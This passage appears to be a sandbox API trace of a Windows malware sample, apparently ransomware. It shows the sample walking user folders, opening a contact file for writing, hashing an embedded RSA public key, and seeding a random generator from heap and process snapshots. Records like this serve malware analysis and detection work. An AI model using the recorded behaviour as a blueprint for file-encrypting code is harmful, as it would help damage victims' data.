hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c3f8 | out: hHeap=0xcd0000) returned 1 [0166.090] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0166.091] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1777ff60, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1777ff60, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0166.091] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0166.091] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdfdb3fc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdfdb3fc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0166.091] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdfdb3fc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdfdb3fc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0166.091] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0166.091] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0166.091] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c768 | out: hHeap=0xcd0000) returned 1 [0166.091] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0166.091] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0166.091] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="Application Data\\" [0166.091] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0166.091] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0166.091] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c548 | out: hHeap=0xcd0000) returned 1 [0166.091] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0166.091] PathFindFileNameW (pszPath="") returned="" [0166.092] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdfdb3fc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdfdb3fc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0166.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0166.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0166.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a68 | out: hHeap=0xcd0000) returned 1 [0166.092] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0166.092] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0166.092] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="Contacts\\" [0166.092] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0166.092] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0166.092] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c548 | out: hHeap=0xcd0000) returned 1 [0166.092] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0166.092] PathFindFileNameW (pszPath="") returned="" [0166.092] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0166.093] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a68 | out: hHeap=0xcd0000) returned 1 [0166.093] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0166.093] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0166.093] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned=".contact" [0166.093] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0166.155] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=1178) returned 1 [0166.155] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0166.158] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x474, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.159] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0166.161] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x49a, lpOverlapped=0x0) returned 1 [0166.162] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0166.162] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0166.162] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0166.162] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f0b8) returned 1 [0166.163] CryptCreateHash (in: hProv=0xd2f0b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0166.163] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0166.163] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0166.163] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e0430 [0166.163] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e0430, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e0430, pdwDataLen=0x401fa54) returned 1 [0166.163] GetLastError () returned 0x0 [0166.163] SetLastError (dwErrCode=0x0) [0166.163] GetLastError () returned 0x0 [0166.163] SetLastError (dwErrCode=0x0) [0166.164] GetLastError () returned 0x0 [0166.164] SetLastError (dwErrCode=0x0) [0166.164] GetLastError () returned 0x0 [0166.164] SetLastError (dwErrCode=0x0) [0166.164] GetLastError () returned 0x0 [0166.164] SetLastError (dwErrCode=0x0) [0166.164] GetLastError () returned 0x0 [0166.164] SetLastError (dwErrCode=0x0) [0166.164] GetLastError () returned 0x0 [0166.164] SetLastError (dwErrCode=0x0) [0166.164] GetLastError () returned 0x0 [0166.164] SetLastError (dwErrCode=0x0) [0166.164] GetLastError () returned 0x0 [0166.164] SetLastError (dwErrCode=0x0) [0166.164] GetLastError () returned 0x0 [0166.164] SetLastError (dwErrCode=0x0) [0166.164] GetLastError () returned 0x0 [0166.164] SetLastError (dwErrCode=0x0) [0166.164] GetLastError () returned 0x0 [0166.164] SetLastError (dwErrCode=0x0) [0166.164] GetLastError () returned 0x0 [0166.164] SetLastError (dwErrCode=0x0) [0166.165] GetLastError () returned 0x0 [0166.165] SetLastError (dwErrCode=0x0) [0166.165] GetLastError () returned 0x0 [0166.165] SetLastError (dwErrCode=0x0) [0166.165] GetLastError () returned 0x0 [0166.165] SetLastError (dwErrCode=0x0) [0166.165] GetLastError () returned 0x0 [0166.165] SetLastError (dwErrCode=0x0) [0166.165] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c548 [0166.165] GetLastError () returned 0x0 [0166.165] SetLastError (dwErrCode=0x0) [0166.165] GetLastError () returned 0x0 [0166.165] SetLastError (dwErrCode=0x0) [0166.165] GetLastError () returned 0x0 [0166.165] SetLastError (dwErrCode=0x0) [0166.165] GetLastError () returned 0x0 [0166.165] SetLastError (dwErrCode=0x0) [0166.165] GetLastError () returned 0x0 [0166.165] SetLastError (dwErrCode=0x0) [0166.165] GetLastError () returned 0x0 [0166.166] SetLastError (dwErrCode=0x0) [0166.166] GetLastError () returned 0x0 [0166.166] SetLastError (dwErrCode=0x0) [0166.166] GetLastError () returned 0x0 [0166.166] SetLastError (dwErrCode=0x0) [0166.166] GetLastError () returned 0x0 [0166.166] SetLastError (dwErrCode=0x0) [0166.166] GetLastError () returned 0x0 [0166.166] SetLastError (dwErrCode=0x0) [0166.166] GetLastError () returned 0x0 [0166.166] SetLastError (dwErrCode=0x0) [0166.166] GetLastError () returned 0x0 [0166.166] SetLastError (dwErrCode=0x0) [0166.166] GetLastError () returned 0x0 [0166.166] SetLastError (dwErrCode=0x0) [0166.166] GetLastError () returned 0x0 [0166.166] SetLastError (dwErrCode=0x0) [0166.166] GetLastError () returned 0x0 [0166.166] SetLastError (dwErrCode=0x0) [0166.166] GetLastError () returned 0x0 [0166.167] SetLastError (dwErrCode=0x0) [0166.167] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0166.167] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c548 | out: hHeap=0xcd0000) returned 1 [0166.167] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0430 | out: hHeap=0xcd0000) returned 1 [0166.167] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0166.167] CryptReleaseContext (hProv=0xd2f0b8, dwFlags=0x0) returned 1 [0166.167] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0166.167] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0166.167] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0166.167] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0166.167] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0166.167] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0166.167] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0166.167] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4a0) returned 0x3b447b0 [0166.167] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0166.167] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0166.167] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44c58 [0166.167] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0166.167] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0166.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613670 [0166.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a68 [0166.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0xd3b9b0 [0166.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb40 [0166.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e02f0 [0166.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbb58 [0166.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb28 [0166.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0xd11f78 [0166.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbae0 [0166.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0430 [0166.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbab0 [0166.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbac8 [0166.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb10 [0166.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44e88 [0166.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbaf8 [0166.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0166.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb88 [0166.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbba0 [0166.168] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0166.169] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0xd23a00 [0166.169] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xd23a00, Size=0x218) returned 0x3b47e70 [0166.169] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48090 [0166.169] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0166.169] GetVersionExA (in: lpVersionInformation=0x401f380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x48, dwMinorVersion=0x401f3a8, dwBuildNumber=0x420cab, dwPlatformId=0x0, szCSDVersion="þBE") | out: lpVersionInformation=0x401f380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0166.169] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x77710000 [0166.170] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0166.170] LoadLibraryA (lpLibFileName="NETAPI32.DLL") returned 0x740d0000 [0167.009] GetProcAddress (hModule=0x740d0000, lpProcName="NetStatisticsGet") returned 0x740d644f [0167.010] GetProcAddress (hModule=0x740d0000, lpProcName="NetApiBufferFree") returned 0x741013d2 [0167.010] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c18, Level=0x0, Options=0x0, Buffer=0x401f02c | out: Buffer=0x401f02c) returned 0x0 [0167.273] GetCurrentThreadId () returned 0x324 [0167.273] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.273] NetApiBufferFree (Buffer=0x361c460) returned 0x0 [0167.273] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c3c, Level=0x0, Options=0x0, Buffer=0x401f02c | out: Buffer=0x401f02c) returned 0x0 [0167.280] GetCurrentThreadId () returned 0x324 [0167.280] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.280] NetApiBufferFree (Buffer=0x3613670) returned 0x0 [0167.280] FreeLibrary (hLibModule=0x740d0000) returned 1 [0167.282] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0167.282] GetProcAddress (hModule=0x77710000, lpProcName="CryptGenRandom") returned 0x7771dfc8 [0167.283] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0167.283] CryptAcquireContextW (in: phProv=0x401f018, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401f018*=0xd2f1c8) returned 1 [0167.284] CryptGenRandom (in: hProv=0xd2f1c8, dwLen=0x40, pbBuffer=0x401f464 | out: pbBuffer=0x401f464) returned 1 [0167.284] GetCurrentThreadId () returned 0x324 [0167.284] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.285] CryptReleaseContext (hProv=0xd2f1c8, dwFlags=0x0) returned 1 [0167.285] CryptAcquireContextW (in: phProv=0x401f018, szContainer=0x0, szProvider="Intel Hardware Cryptographic Service Provider", dwProvType=0x16, dwFlags=0x0 | out: phProv=0x401f018*=0xd2f1c8) returned 0 [0167.285] FreeLibrary (hLibModule=0x77710000) returned 1 [0167.285] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0167.285] GetProcAddress (hModule=0x400000, lpProcName="_OPENSSL_isservice") returned 0x0 [0167.285] GetDesktopWindow () returned 0x10010 [0167.285] GetProcessWindowStation () returned 0x48 [0167.376] GetUserObjectInformationW (in: hObj=0x48, nIndex=2, pvInfo=0x0, nLength=0x0, lpnLengthNeeded=0x401efa0 | out: pvInfo=0x0, lpnLengthNeeded=0x401efa0) returned 0 [0167.377] GetLastError () returned 0x7a [0167.377] GetUserObjectInformationW (in: hObj=0x48, nIndex=2, pvInfo=0x401ef80, nLength=0x10, lpnLengthNeeded=0x401efa0 | out: pvInfo=0x401ef80, lpnLengthNeeded=0x401efa0) returned 1 [0167.377] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x77130000 [0167.378] GetProcAddress (hModule=0x77130000, lpProcName="GetForegroundWindow") returned 0x77152320 [0167.378] GetProcAddress (hModule=0x77130000, lpProcName="GetCursorInfo") returned 0x771a812f [0167.378] GetProcAddress (hModule=0x77130000, lpProcName="GetQueueStatus") returned 0x77153924 [0167.378] GetForegroundWindow () returned 0x10256 [0167.378] GetCurrentThreadId () returned 0x324 [0167.379] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.379] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.379] GetCursorInfo (in: pci=0x401f450 | out: pci=0x401f450) returned 1 [0167.379] GetQueueStatus (flags=0xbf) returned 0x0 [0167.379] GetCurrentThreadId () returned 0x324 [0167.379] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.379] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.379] FreeLibrary (hLibModule=0x77130000) returned 1 [0167.379] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0167.379] GetProcAddress (hModule=0x76d30000, lpProcName="CloseToolhelp32Snapshot") returned 0x0 [0167.380] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32First") returned 0x76dc5763 [0167.380] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32Next") returned 0x76dc594e [0167.380] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32ListFirst") returned 0x76dc5621 [0167.383] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32ListNext") returned 0x76dc56cb [0167.384] GetProcAddress (hModule=0x76d30000, lpProcName="Process32First") returned 0x76d68ae7 [0167.384] GetProcAddress (hModule=0x76d30000, lpProcName="Process32Next") returned 0x76d688a4 [0167.384] GetProcAddress (hModule=0x76d30000, lpProcName="Thread32First") returned 0x76dc5b93 [0167.385] GetProcAddress (hModule=0x76d30000, lpProcName="Thread32Next") returned 0x76dc5c3f [0167.385] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0167.385] GetProcAddress (hModule=0x76d30000, lpProcName="Module32Next") returned 0x76dc5dc2 [0167.385] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x674 [0167.400] GetTickCount () returned 0x11592af [0167.400] Heap32ListFirst (hSnapshot=0x674, lphl=0x401f454) returned 1 [0167.401] GetCurrentThreadId () returned 0x324 [0167.401] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.401] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.401] Heap32First (lphe=0x401efc0, th32ProcessID=0x900, th32HeapID=0xcd0000) returned 1 [0167.467] GetCurrentThreadId () returned 0x324 [0167.467] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.467] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.467] Heap32Next (lphe=0x401efc0) returned 1 [0167.492] GetTickCount () returned 0x115930c [0167.492] GetCurrentThreadId () returned 0x324 [0167.492] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.492] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0167.492] Heap32Next (lphe=0x401efc0) returned 1 [0167.517] GetTickCount () returned 0x115932c [0167.517] GetCurrentThreadId () returned 0x324 [0167.517] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0167.517] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) 